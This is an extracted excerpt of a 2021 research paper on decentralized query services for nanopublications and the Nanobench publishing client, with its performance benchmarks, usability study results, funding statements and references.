The LDF-based services reduce the complexity and load on the server by only allowing for very simple queries to be asked to the server, and delegate the responsibility of orchestrating them to answer more complex questions to the client. The grlc-based 1 For simplicity, URLs for p and g are prefixed, whereas they will be expanded in practise. 2 A live example of a QPF client that can query over this API can be found at http://query.linkeddatafragments.org/ #datasources=https%3A%2F%2Fldf. nanopubs.knows.idlab.ugent.be%2Fnp. Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 8/23 https://example.org/?p=npx:retracts&g=sub:assertion https://ldf.nanopubs.knows.idlab.ugent.be/np http://purl.org/nanopub/monitor http://query.linkeddatafragments.org/#datasources=https%3A%2F%2Fldf.nanopubs.knows.idlab.ugent.be%2Fnp http://query.linkeddatafragments.org/#datasources=https%3A%2F%2Fldf.nanopubs.knows.idlab.ugent.be%2Fnp http://query.linkeddatafragments.org/#datasources=https%3A%2F%2Fldf.nanopubs.knows.idlab.ugent.be%2Fnp http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ services reduce the complexity and load by allowing only for queries that are based on a small number of SPARQL templates that are hand-crafted for optimized performance. These two kinds of services are thereby designed to be complementary, with grlc being restricted but faster and LDF being more powerful but slower. The grlc-based services provide general API operations that are based on 14 SPARQL templates: � find_nanopubs returns all nanopublication identifiers in undefined order (paginated in groups of 1,000) possibly restricted by the year, month, or day of creation; � find_nanopubs_with_pattern additionally allows for specifying the subject, predicate, and/or object of a triple in the nanopublication as a filter, and to restrict the occurrence of that triple to the assertion, provenance, or publication info graph; � find_nanopubs_with_uri similarly allows for filtering by a URI irrespective of its triple position; � find_nanopubs_with_text supports full-text search on the literals in the nanopublication (using non-standard SPARQL features available in Virtuoso and GraphDB); � for each of the four find_nanopubs_* templates mentioned above, there is also a find_signed_nanopubs_* version that only returns nanopublications that have a valid signature and that allows for filtering by public key; � get_all_indexes returns all nanopublication indexes (i.e., sets of nanopublications); � get_all_users returns all users who announced a public key via an introduction nanopublication; � get_backlinks returns all identifiers of nanopublications that directly point to a given nanopublication; � get_deep_backlinks does the same thing but includes deep links through chains of nanopublications linking to the given one; � get_latest_version returns the latest version of a given nanopublication signed by the same public key by following npx:supersedes backlinks; � get_nanopub_count returns the number of nanopublications, possibly restricted by year, month, or day of creation. The full SPARQL templates can be found in the Supplemental Material (see below). These API calls provide a general set of queries based on which applications with more complex behavior can be built. We will introduce Nanobench as an example of such an application below. In order to answer some of the above queries, auxiliary data structures have to be created while loading new nanopublications. 
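As a small illustration of how an application could consume one of these operations, the following sketch issues a parameterized GET request to the find_nanopubs_with_pattern operation. The base URL, the parameter names, and the result variable are hypothetical placeholders (the actual names are determined by the deployed grlc instances and the SPARQL templates in the Supplemental Material); the point is only the general calling pattern of a grlc-generated API.

# Hypothetical sketch of calling a grlc-generated API operation; base URL,
# parameter names, and the result variable "np" are assumptions made for
# illustration, not the documented interface of the deployed services.
import requests

GRLC_API = "https://example.org/api"  # placeholder base URL of one instance

def find_nanopubs_with_pattern(pred=None, obj=None, page=1):
    """Return nanopublication URIs that contain a matching triple."""
    params = {"page": page}
    if pred:
        params["pred"] = pred  # assumed name of the predicate parameter
    if obj:
        params["obj"] = obj    # assumed name of the object parameter
    resp = requests.get(GRLC_API + "/find_nanopubs_with_pattern",
                        params=params,
                        headers={"Accept": "application/sparql-results+json"})
    resp.raise_for_status()
    return [row["np"]["value"] for row in resp.json()["results"]["bindings"]]

# Example: the first page of nanopublications containing a foaf:knows triple.
for np_uri in find_nanopubs_with_pattern(pred="http://xmlns.com/foaf/0.1/knows"):
    print(np_uri)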
Most importantly, digital signatures cannot be checked in SPARQL directly, as this involves translating the triples of a nanopublication into a normalized serialization and then calculating a cryptographic hash function on it, which goes beyond SPARQL’s capabilities. Other aspects like deep backlinks are complicated because it is not sufficient to check whether a link is present, but we also need Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 9/23 http://dx.doi.org/10.7717/peerj-cs.387#supplemental-information http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ to check that the respective triple is located in the linking nanopublication (as a triple linking two nanopublications could itself be located in a third nanopublication). In order to solve these problems, additional triples in two administrative graphs are generated when new nanopublications are loaded. Concretely, the following triples are added for each nanopublication (placeholders in capitals): npa:graph { npa:hasHeadGraph ; dct:created "DATETIME"^^xsd:dateTime ; npa:creationDay ; npa:creationMonth ; npa:creationYear ; npa:hasValidSignatureForPublicKey "PUBLICKEY" . } npa:networkGraph { REFERENCED-NPURIS… . npa:refersToNanopub REFERENCED-NPURIS… . } The first triple of the npa:graph links the nanopublication identifier to its head graph, where the links to its assertion, provenance, and publication info graphs can be found. The second one contains the creation date in a normalized form. Number three to five allow for efficient filtering by day, month, and year, respectively (we use URIs instead of literals because this happens to be much faster for filtering under Virtuoso). The final triple in the npa:graph links the nanopublication to its public key if the signature was found to be valid. In the npa:networkGraph, all instances of linking to another nanopublication with the linking nanopublication URI in subject position are added (e.g., with npx: supersedes). In the cases where another nanopublication is linked but not with the pattern of the linking nanopublication in subject position (e.g., as with npx:retracts), npa:refersToNanopub is used as predicate to link the two nanopublications. We set up a network of six servers in five different countries each providing both of the introduced services (LDF-based and grlc-based). They are notified about new nanopublications by the servers of the existing publishing network, which are otherwise running independently. The services connect to a local instance of a Virtuoso triple store (https://virtuoso.openlinksw.com/), into which all nanopublications are loaded via a connector module. This connector module also creates the additional triples in the administrative graphs as explained above. While the restriction to predefined templates with grlc significantly improves the scalability of the system as compared to unrestricted SPARQL, further measures will be needed in the future if the number of nanopublications keeps growing to new orders of magnitude. The services presented here are designed in such a way that such measures are possible with minimal changes to the API. The 14 query templates of the grlc services can be distributed to different servers, for example, such that a single server would only be Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 10/23 https://virtuoso.openlinksw.com/ http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ responsible for one of the 14 kinds of queries. 
This server could then use an optimized data structure for exactly that kind of query and would only need to hold a fraction of the data. The find_ queries could moreover be further compartmentalized based on publication date, for example each server instance just covering a single year. The LDF-based services could be distributed in a similar fashion, for example based on the predicate namespace. Nanobench client and templates To demonstrate and evaluate our approach, we next implemented a client application that runs on the user’s local computer, can be accessed through their web browser, and connects to the above decentralized network of services. The code can be found online (https://github.com/peta-pico/nanobench) and Fig. 3 shows a screenshot. In the “search” part of the interface, users are provided with a simple search interface that connects to the grlc API operations find_nanopubs_with_uri (if a URI is entered in the search field) or find_nanopubs_with_text (otherwise). In the “others” part, other users’ latest nanopublications can be seen in a feed-like manner, similar to Twitter feeds. In order for users to publish their own nanopublications and thereby create their own feed, they have to first set up their profile. Nanobench provides close guidance through this process, which involves the declaration of the user’s ORCID identifier, the creation of an RSA key pair, and the publication of an introduction nanopublication that links the public key to the ORCID identifier. The last step of linking the new introduction nanopublication from the user’s ORCID profile is not strictly necessary for the user to start publishing nanopublications and is therefore marked as optional. Once the user profile is completed, a list of templates is shown in the “publish” part of the interface. Templates are published as nanopublications as well, and so this list can be populated via a call to the find_signed_nanopubs_with_pattern operation of the grlc-based services. Currently, the list includes templates for free-text commenting on a URL, expressing a foaf:knows relation to another person, declaring that the user has read a given paper, expressing a gene–disease association, retracting a nanopublication, describing a datasets with a SPARQL endpoint, and publishing an arbitrary RDF triple. Figure 3 A screenshot of the Nanobench application with a publication form. Full-size DOI: 10.7717/peerj-cs.387/fig-3 Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 11/23 https://github.com/peta-pico/nanobench http://dx.doi.org/10.7717/peerj-cs.387/fig-3 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ After selecting a template, a form is automatically generated that allows the user to fill in information according to that template, as shown in Fig. 3. Templates describe the kind of statements users can publish and also provide additional information on how the input form should be presented to the user. This is an example of a template (the same one that is shown in Fig. 3), defined in the assertion graph of a nanopublication: sub:assertion { sub:assertion a nt:AssertionTemplate ; rdfs:label "Expressing that you know somebody" ; nt:hasStatement sub:st1 . sub:st1 a rdf:Statement ; rdf:subject nt:CREATOR ; rdf:predicate foaf:knows ; rdf:object sub:person . foaf:knows rdfs:label "know" . sub:person a nt:UriPlaceholder ; rdfs:label "ORCID identifier of the person you know" ; nt:hasPrefix "https://orcid.org/" ; nt:hasRegex "[0-9]{4}-[0-9]{4}-[0-9]{4}-[0-9]{3}[0-9X]" . 
} In a template nanopublication, the assertion graph is classified as an AssertionTemplate (in the namespace https://w3id.org/np/o/ntemplate/) and given a human readable label with rdfs:label. Moreover, it is linked to the statement templates (i.e., triples in the nanopublications to be published) via hasStatement. The above example has just one such statement template, but more complex templates involve several of them. These templates then use regular RDF reification to point to their subjects, predicates, and objects. In the case of multiple statements, their order in the form can be defined with statementOrder and some of them can be marked as optional by classifying them as OptionalStatement. rdfs:label can be used on all the elements to define how they should be labeled in the form interface, and the special URI CREATOR is mapped to the identifier of the user applying the template. Importantly, the URIs in subject, predicate, or object position of the template statements can be declared placeholders with the class UriPlaceholder, and similarly for literals with LiteralPlaceholder. Such placeholders are represented as input elements, such as text fields or drop-down menus, in the form that is generated from the template. Currently supported more specific placeholder types include TrustyUriPlaceholder, which requires a trusty URI (such as a nanopublication URI), and RestrictedChoicePlaceholder, which leads to a drop-down menu with the possible options defined by the property possibleValue. For URI placeholders, prefixes can be defined with hasPrefix and regex restrictions with hasRegex, as can be seen in the example above. Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 12/23 https://w3id.org/np/o/ntemplate/ http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ Once the user filled in a form that was generated from a template and clicks on “Publish”, Nanobench creates the assertion graph of a new nanopublication by following the template and replacing all the placeholders with the user’s input. For the provenance graph, only a simple prov:wasAttributedTo link to the user’s identifier is currently added (we are working on extending the coverage of templates to the provenance and publication info graphs). In the publication info graph, Nanobench adds a timestamp, specifies the user as the creator of the nanopublication, and adds a wasCreatedFromTemplate link that points to the underlying template nanopublication. Then, Nanobench adds a digital signature element to the publication info graph with a signature made from the user’s local private key, transforms the whole nanopublication into its final state with a trusty URI, and finally publishes it to the server network with a simple HTTP POST request. Within a few minutes or less, it then appears in the user’s feed. Nanobench currently makes use of the redundancy of the nanopublication services in a very simple way: For each query, it randomly selects two grlc service instances and sends the same query to both. It then processes the result as soon as it gets the first answer and discards the second, thereby increasing the chance of success and lowering the average waiting time. More sophisticated versions of this protocol are of course easily imaginable and will be investigated in future work. PERFORMANCE EVALUATION In order to evaluate our approach, we introduce here a performance evaluation that we ran on the network of nanopublication services. 
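To make the placeholder mechanics concrete, here is a small illustrative sketch of how a single form value could be validated and expanded according to the foaf:knows template above. It is a simplification under stated assumptions (Nanobench itself operates on the RDF template directly, and the helper below is not part of its code base), but it shows the roles of nt:hasPrefix, nt:hasRegex, and the special CREATOR URI.

# Simplified, hypothetical sketch of instantiating the foaf:knows template:
# the form input is checked against the declared regex (nt:hasRegex),
# expanded with the declared prefix (nt:hasPrefix), and substituted into the
# statement together with the publishing user's identifier (nt:CREATOR).
import re

KNOWS_TEMPLATE = {
    "predicate": "http://xmlns.com/foaf/0.1/knows",
    "object_placeholder": {
        "prefix": "https://orcid.org/",
        "regex": r"[0-9]{4}-[0-9]{4}-[0-9]{4}-[0-9]{3}[0-9X]",
    },
}

def instantiate(creator_uri, form_value):
    ph = KNOWS_TEMPLATE["object_placeholder"]
    if not re.fullmatch(ph["regex"], form_value):
        raise ValueError("input does not match the placeholder's regex")
    return (creator_uri,                      # nt:CREATOR -> publishing user
            KNOWS_TEMPLATE["predicate"],
            ph["prefix"] + form_value)        # prefix + validated input

print(instantiate("https://orcid.org/0000-0001-2345-6789",
                  "0000-0002-1825-0097"))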
In the next section we will then look into whether these services are useful to potential end users with a usability evaluation on Nanobench. Performance evaluation design For this performance evaluation we wanted to find out how well the two types of services— LDF-based and grlc-based—perform in our network of services, how they compare, and to what extent they are really complementary. For this purpose, we defined a set of concrete queries that we can then submit to both services. We started with the 14 query templates of the grlc-based service, and instantiated each of them with a simple set of parameters to make 14 concrete executable queries. As parameter values, we chose generic yet realistically useful examples that return non-trivial answer sets for the kind of nanopublications that the current templates describe: (1) find_nanopubs restricted to the month 2020-02; (2) find_nanopubs_with_pattern with the predicate value set to foaf:knows; (3) find_nanopubs_with_text on the free-text keyword “john”; (4) find_nanopubs_with_uri to search for nanopublications mentioning a given ORCID identifier; (5–8) of the form find_signed_nanopubs_* are given the same parameters as (1–4); (9) get_all_indexes and (10) get_all_users do not need parameters; (11) get_backlinks and (12) get_deep_backlinks are given the URI of a specific nanopublication, which has a substantial number of backlinks; (13) get_latest_version is given the URI of the first version of a template Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 13/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ nanopublication that has afterwards been updated four times; and (14) get_nanopub_count is, like (1), restricted to the month 2020-02. We can run these queries via the grlc-powered API but we can also use an LDF engine like Comunica to run them against our LDF-based services. The latter comes with some caveats, as the free text queries of find_nanopubs_with_text and find_signed_nanopubs_with_text depend on implementation-dependent non-standard extensions of SPARQL that do not work with LDF-style query execution. Moreover, Comunica currently lacks support for complex property paths, which are needed for get_deep_backlinks and get_latest_version. Queries (3), (7), (12), and (13) can therefore only be run on the grlc-based services but not on the LDF-based ones. However, the power of the LDF-based services is of course that they can (potentially) run arbitrary SPARQL queries (with some restrictions, as mentioned above). To demonstrate and test this ability, we created another query (15) that in a simple way combines the outputs of two of the currently available templates. Specifically, it checks for a given user (below abbreviated as me:) who he has declared to know via the foaf:knows template, and then searches for papers these people declared to have read via a different template. Thereby, query (15) returns a list of all papers that friends of the user me: have read: select ?person ?paper where { me: foaf:knows ?person . ?person pc:hasRead ?paper . } This query can be considered a quick-and-dirty solution for exploration purposes, as it misses a number of checks. It does not check that both triples are in the assertion graphs of signed nanopublications, that the first is signed with the public key corresponding to the user in subject position, and that neither of the nanopublications is superseded or retracted. We therefore define query (16) that includes all these checks. 
This query is more complicated, and we show here for illustration just the SPARQL fragment of the part necessary to check that the second nanopublication ?np2 with public key ?pubkey2 was not retracted: filter not exists { graph npa:graph { ?retraction npa:hasHeadGraph ?rh . ?retraction npa:hasValidSignatureForPublicKey ?pubkey2 . } graph ?rh { ?retraction np:hasAssertion ?ra . } graph ?ra { ?somebody npx:retracts ?np2 . } } The inconvenience of writing such rather complicated queries can be addressed by future versions of the services, which could include predefined options to restrict the query to the assertion graphs and to up-to-date content. The full set of used Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 14/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ queries and further details can be found in the Supplemental Material online (DOI 10.5281/zenodo.3994068). To evaluate the performance of the nanopublication services, we accessed them in a clearly defined setting from a number of different locations from personal computers via home networks, by running the 16 queries specified above on all service instances of both kinds. For that, we created a Docker image that accesses the grlc-based services with simple HTTP requests via curl and the LDF-based ones with the Comunica (https://github.com/comunica/comunica) engine 1.12.1. The results as well as the execution time of all the calls are recorded, which is then used to evaluate the performance. For both kinds of services, the timeout is set to 60 s. Performance evaluation results We ran the Dockerized evaluation process described above at five places in four different countries. Each of them ran all of the compatible queries on each of the six existing service instance for both of the two kinds. For each query we therefore have 30 outcomes for grlc and another 30 outcomes for LDF. These outcomes fall into the general categories of timeout, error, and full result. In the case of the LDF-based services, timeout and error outcomes can come with partial results. Figure 4 shows a summary of these overall outcomes. With grlc, 96% of the calls succeeded and only 4% resulted in an error (mostly due to downtime of one particular service). With LDF, 73% fully succeeded, 21% reached the timeout, and 6% gave an error. The latter two sometimes gave partial results: overall 6% reached a timeout while still giving partial results, and overall 3% gave an error with a partial result. For LDF, these types of outcomes are not evenly distributed. Two queries— find_nanopubs_with_uri (4) and get_all_indexes (9)—never fully succeeded, but the former sometimes gave partial results. For the remaining queries, however, these LDF calls returned at least a partial result in 97% of the cases. Except for query (1) in addition to the above mentioned (4) and (9), the full result was always received from at least one of the servers in LDF mode. For grlc, this was the case for all queries. 
Figure 4 Overall outcomes per query and kind of service, executed from five locations. (Bar chart showing, per query and for both grlc and LDF, the ratio of query executions ending in a full result, a timeout with or without partial result, or an error with or without partial result.)
A client checking multiple servers would therefore have eventually received the full result. For query (1) in LDF mode, this was true for 4 cases out of 5. Next, we can look at the time performance. Table 1 shows the average execution times per query and service type, including only the calls that returned a full result. The successful queries to the grlc services took on average from 0.21 to 6.46 s. For the LDF services, these numbers range from 1.53 to 35.26 s (but they can be a bit misleading as they ignore the fact that the LDF services repeatedly hit the time limit of 60 s). For the queries that could successfully be run on both kinds of services, LDF is on average 7.18 to 86.50 times slower than grlc. Importantly, the queries that do not follow a predefined pattern (15) and (16) gave the full result with LDF in 97% of the cases and ran reasonably fast. The quick-and-dirty version (15) required on average 2.30 s, whereas the thorough one (16) completed on average after 10.07 s.

Table 1 Average execution times of the successful query executions in seconds.
   Query                               grlc    LDF     LDF/grlc
1  find_nanopubs                       1.02    35.26   34.48
2  find_nanopubs_with_pattern          0.55    6.69    12.20
3  find_nanopubs_with_text             6.46
4  find_nanopubs_with_uri              0.78
5  find_signed_nanopubs                0.49    20.77   42.05
6  find_signed_nanopubs_with_pattern   0.73    9.57    13.04
7  find_signed_nanopubs_with_text      1.54
8  find_signed_nanopubs_with_uri       0.34    29.53   86.50
9  get_all_indexes                     3.52
10 get_all_users                       0.65    31.09   47.71
11 get_backlinks                       0.21    1.53    7.18
12 get_deep_backlinks                  0.68
13 get_latest_version                  0.71
14 get_nanopub_count                   0.23    6.54    28.29
15 papers                                      2.30
16 papers_x                                    10.07

USABILITY EVALUATION Now that we know that the services perform reasonably well, we wanted to find out whether this general approach and our specific Nanobench tool indeed make it easy for users who might not be experts in Linked Data to publish their own small data entries.
Usability evaluation design We wanted to test the usability of Nanobench in a real setting, where users actually publish nanopublications. For that we wrote detailed instructions on how to install and use Nanobench and its publication feature, which includes downloading the latest Nanobench release, running it locally, accessing Nanobench through their web browser, completing the Nanobench profile, accessing the list of templates, and finally filling in and submitting
Sci., DOI 10.7717/peerj-cs.387 16/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ the publication form generated from a chosen template. Through mailing lists, social media, and personal contacts, we tried to convince as many people as possible to try out Nanobench and to publish some nanopublications on their own. Next, we created an anonymous usability questionnaire, consisting of the ten standard questions of the widely used System Usability Scale (SUS) (Brooke, 1996). We added to that the questions “Have you published RDF/Linked Data before?” and “Have you digitally signed RDF/Linked Data before?”, and as a follow up to each of them—if the answer was “yes”—whether Nanobench was harder or easier to use for publishing and signing Linked Data, respectively, compared to how they previously did it. The responses were on a 5-point Likert scale from 1 (Nanobench was harder) to 5 (Nanobench was easier). We sent this questionnaire to all the Nanobench users who published at least one nanopublication (not counting their introduction nanopublication), excluding the co-authors of this paper and their close relatives. Further details, including instructions and questionnaire, can be found in the supplemental material online (DOI 10.5281/zenodo.3994066). Usability evaluation results Overall, 42 users registered in the decentralized system by publishing an introduction nanopublication. A total of 29 of them (69%) also linked this introduction nanopublication from their ORCID accounts, which was a step that was marked as optional. Collectively, they published 81 nanopublications, not counting their introduction nanopublications, via the use of seven distinct templates. After applying the exclusion criteria defined above, we arrived at a set of 29 users to whom we sent the anonymous usability questionnaire (this set of users is overlapping but different from the set of 29 users mentioned just above). After sending up to two reminders, we received responses from all of them. On the question of whether they had published Linked Data before, 21 respondents (72%) said they did. 20 of them (95%) reported that Nanobench was easier to use compared to how they previously published Linked Data, with the remaining one being indifferent (score of 3). The average was 4.5 on the 5-point Likert scale. Of the 21 respondents, only three (14%) stated that they had previously digitally signed Linked Data. All three of them found Nanobench easier, giving two times a 5 and once a 4 as responses (average 4.7). Table 2 shows the results of the SUS questions. Overall, our system achieved a SUS score of 77.76, which is clearly above the average score reported in the literature (70.14) and is roughly in the middle between “good” and “excellent” on an adjective scale (Bangor, Kortum & Miller, 2008). Interestingly, if we only consider the eight respondents who stated they had never published Linked Data before, this value is even better at 85.94, clearly in the “excellent” range. The participants were moreover given the possibility to provide further feedback in a free-text field. We received a variety of comments for further improvement, but except for the point that the required local installation was somewhat inconvenient, no point was mentioned more than once. The other comments concerned the search page being confusing (this part of the interface was indeed not the focus of the study), the lack of Kuhn et al. (2021), PeerJ Comput. 
support for batch publishing of multiple similar nanopublications, the lack of integrated ORCID lookup, the relatively small number of general-purpose templates, the lack of RDF prefix recognition, the fact that not all lengthy URIs are masked with readable labels in the user interface, and the fact that the confirmation checkbox did not mention the possibility of retraction. A further comment was that a command-line interface would have been preferred in the particular context of the given participant. Such a command-line interface actually exists (as part of the nanopub-java library; Kuhn, 2016) but was not the focus of this study.

Table 2 SUS usability evaluation results. The five response-count columns run from the worst to the best response (for the odd questions these are the answers 1 to 5, for the even questions the answers 5 to 1), followed by the resulting score.
SUS question                                                                                    worst  ->  best   Score
1: I think that I would like to use this system frequently                                       0   3   9  13   4   65.52
2: I found the system unnecessarily complex                                                      0   0   3  11  15   85.34
3: I thought the system was easy to use                                                          0   1   1  13  14   84.48
4: I think that I would need the support of a technical person to be able to use this system     1   2   5   7  14   76.72
5: I found the various functions in this system were well integrated                             0   1   7  14   7   73.28
6: I thought there was too much inconsistency in this system                                     0   1   2  15  11   81.03
7: I would imagine that most people would learn to use this system very quickly                  0   3   6  14   6   69.83
8: I found the system very cumbersome to use                                                     0   0   1  17  11   83.62
9: I felt very confident using the system                                                        0   1   6  15   7   74.14
10: I needed to learn a lot of things before I could get going with this system                  0   1   4   8  16   83.62
Total                                                                                            1  13  44 127 105   77.76

DISCUSSION AND CONCLUSION The results of the performance study described above confirm that the tested kinds of queries can be efficiently answered by at least one of the two types of services, and that these two service types are indeed complementary. The grlc services run reliably and fast on the types of queries they are designed for. The LDF services can run most of these kinds of queries too, albeit in a much slower fashion, and they are reasonably fast for simple kinds of unrestricted queries. The results of the usability study indicate that our Nanobench client application connecting to these services is indeed easily and efficiently usable, even for users with no prior experience in Linked Data publishing. In future work, we are planning to improve a number of aspects of the involved tools and methods. For example, our approach does not yet exploit the full potential of replication in our decentralized setting. Existing work has shown that a client-side algorithm can enable effective load-balancing over TPF servers (Minier et al., 2018), and we plan to extend this work to QPF. As another example, our otherwise decentralized approach currently uses centralized ORCID identifiers. We are therefore investigating decentralized forms of authentication, such as WebID-OIDC (https://github.com/solid/webid-oidc-spec) or an approach similar to the web of trust (Caronni, 2000), where public keys are found based on personal trust relationships that could themselves be published as nanopublications.
Such a web of trust could then also allow users in the future to find trustworthy services. This could include meta services whose task is to monitor and test other kinds of services, so clients could make an informed decision on which service instances to rely on. This is currently difficult, as there is no guarantee that all services are well-behaved and return complete and correct results. Clients could already now deal with this by taking random samples of nanopublications from the publishing servers and check whether the query services correctly return them, but this is quite resource intensive. Another issue that needs to be taken care of in future work is identity management when private keys are compromised, lost, or simply replaced as a measure of precaution. For that, we envisage that introduction nanopublications are extended so users can also list old public keys. On top of that, we are going to need a method for users to re-claim old nanopublications they signed with an old key that has since been compromised by a third party (possibly by linking to them with an index nanopublication signed with a new key). This will also require modifications in how we deal with retracted and superseded nanopublications, as they might then be signed with a different key. This is not trivial but can be dealt with within our framework, as opposed to Blockchain-based solutions where identity is inseparably linked to private key access. Currently, users need to install Nanobench locally to ensure secure private key access and proper decentralization, but a more flexible and more powerful handling of private keys as explained above will also allow us to provide login-based public Nanobench instances with their own sets of private keys, which in turn can significantly increase the ease of use of our approach. More work is also needed on the templating features to also cover the provenance and publication info graphs. We also plan to more closely align our templating vocabulary with existing RDF shape standards. Moreover, we are working on making our templating approach more general and more powerful, by adding repeatable statement patterns among other features, such that we can express, for example, templates of templates and thereby allow users to create and publish their own templates directly via Nanobench. The tools and applications we described above in a sense just scratch the surface of what can become possible with our general approach in the nearer future, from Linked Data publications of the latest scientific findings, to formally organized argumentation and automated real-time aggregations. We believe that our approach of semantic micro-contributions could in fact be the starting point of bringing Linked Data publishing to the masses. ADDITIONAL INFORMATION AND DECLARATIONS Funding Ruben Taelman is a postdoctoral fellow of the Research Foundation — Flanders (FWO) (1274521N). Support for Vincent Emonet and Michel Dumontier was provided by the Biomedical Data Translator project funded by National Institutes of Health (No. OT2TR003434-01). Stian Soiland-Reyes was funded by BioExcel-2 (European Kuhn et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.387 19/23 http://dx.doi.org/10.7717/peerj-cs.387 https://peerj.com/computer-science/ Commission H2020-INFRAEDI-02-2018-823830). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. 
Grant Disclosures
The following grant information was disclosed by the authors:
Research Foundation - Flanders (FWO): 1274521N.
National Institutes of Health: OT2TR003434-01.
BioExcel-2 (European Commission): H2020-INFRAEDI-02-2018-823830.

Competing Interests
Haris Antonatos is employed by SciFY. The authors declare that they have no competing interests.

Author Contributions
• Tobias Kuhn conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• Ruben Taelman performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• Vincent Emonet performed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
• Haris Antonatos performed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
• Stian Soiland-Reyes performed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
• Michel Dumontier performed the experiments, authored or reviewed drafts of the paper, and approved the final draft.

Data Availability
The following information was supplied regarding data availability:
Supplemental data for the performance evaluation is available at Zenodo: Tobias Kuhn, & Vincent Emonet. (2020, August 21). peta-pico/nanopub-services-eval 1.0 (Version 1.0). Zenodo. DOI 10.5281/zenodo.3994068.
Supplemental data for the usability evaluation is available at Zenodo: Tobias Kuhn. (2020, August 21). peta-pico/nanobench-usability-eval 1.0 (Version 1.0). Zenodo. DOI 10.5281/zenodo.3994066.
The code for Nanobench (release nanobench-1.7) is available at Zenodo: Tobias Kuhn, & Vincent Emonet. (2020, November 26). peta-pico/nanobench: nanobench-1.7 (Version nanobench-1.7). Zenodo. DOI 10.5281/zenodo.4292171.
The code for the nanopublication services (release nanopub-services-1.0) is also available at Zenodo: Tobias Kuhn. (2020, November 26). peta-pico/nanopub-services: nanopub-services-1.0 (Version nanopub-services-1.0). Zenodo. DOI 10.5281/zenodo.4291594.

Supplemental Information
Supplemental information for this article can be found online at http://dx.doi.org/10.7717/peerj-cs.387#supplemental-information.

REFERENCES
Auer S, Bizer C, Kobilarov G, Lehmann J, Cyganiak R, Ives Z. 2007. DBpedia: A nucleus for a web of open data. In: The Semantic Web. Springer DOI 10.1007/978-3-540-76298-0_52.
Bangor A, Kortum PT, Miller JT. 2008. An empirical evaluation of the system usability scale. International Journal of Human-Computer Interaction 24(6):574–594 DOI 10.1080/10447310802205776.
Baumeister J, Reutelshoefer J, Puppe F. 2011. KnowWE: a semantic wiki for knowledge engineering. Applied Intelligence 35(3):323–344 DOI 10.1007/s10489-010-0224-5.
Berners-Lee T. 2009. Linked data. Available at https://www.w3.org/DesignIssues/LinkedData.html.
Bizer C, Heath T, Berners-Lee T. 2011. Linked data: the story so far. In: Semantic Services, Interoperability and Web Applications: Emerging Concepts. IGI Global DOI 10.4018/978-1-60960-593-3.ch008.
Brooke J. 1996. SUS: a quick and dirty usability scale. In: Jordan PW, Thomas B, Weerdmeester BA, McClelland IL, eds. Usability Evaluation in Industry. Milton Park: Taylor & Francis, 189–194.
Buil-Aranda C, Hogan A, Umbrich J, Vandenbussche P-Y. 2013. SPARQL web-querying infrastructure: ready for action? In: The Semantic Web – ISWC 2013. Springer DOI 10.1007/978-3-642-41338-4_18.
Buyle R, Taelman R, Mostaert K, Joris G, Mannens E, Verborgh R, Berners-Lee T. 2019. Streamlining governmental processes by putting citizens in control of their personal data. In: International Conference on Electronic Governance and Open Society: Challenges in Eurasia. Springer, 346–359 DOI 10.1007/978-3-030-39296-3_26.
Caronni G. 2000. Walking the web of trust. In: WET ICE 2000. Piscataway: IEEE DOI 10.1109/ENABL.2000.883720.
Delva H, Rojas Melendez JA, Colpaert P, Verborgh R. 2019. Decentralized publication and consumption of transfer footpaths. First International Workshop on Semantics for Transport 2447:1–7.
Feigenbaum L, Todd Williams G, Grant Clark K, Torres E. 2013. SPARQL 1.1 protocol. Rec., W3C. Available at https://www.w3.org/TR/2013/RECsparql11-protocol-20130321/.
Ghidini C, Kump B, Lindstaedt S, Mahbub N, Pammer V, Rospocher M, Serafini L. 2009. MoKi: the enterprise modelling wiki. In: European Semantic Web Conference. Springer, 831–835 DOI 10.1007/978-3-642-02121-3_65.
Guha RV, Brickley D, Macbeth S. 2016. Schema.org: evolution of structured data on the web. Communications of the ACM 59(2):44–51 DOI 10.1145/2844544.
Kuhn T. 2008. AceWiki: A Natural and Expressive Semantic Wiki. In: Proceedings of Semantic Web User Interaction at CHI 2008: Exploring HCI Challenges. CEUR Workshop Proceedings.
Kuhn T. 2016. Nanopub-java: a Java library for nanopublications. In: Linked Science: Proceedings of the 5th Workshop on Linked Science 2015 - Best Practices and the Road Ahead (LISC 2015). Vol. 1572. CEUR Workshop Proceedings, 19–25.
Kuhn T, Barbano PE, Nagy ML, Krauthammer M. 2013. Broadening the scope of nanopublications. In: Extended Semantic Web Conference. Springer DOI 10.1007/978-3-642-38288-8_33.
Kuhn T, Chichester C, Krauthammer M, Queralt-Rosinach N, Verborgh R, Giannakopoulos G, Ngomo A-CN, Viglianti R, Dumontier M. 2016. Decentralized provenance-aware publishing with nanopublications. PeerJ Computer Science 2(1):e78 DOI 10.7717/peerj-cs.78.
Kuhn T, Dumontier M. 2015. Making digital artifacts on the web verifiable and reliable. IEEE Transactions on Knowledge and Data Engineering 27(9):2390–2400 DOI 10.1109/TKDE.2015.2419657.
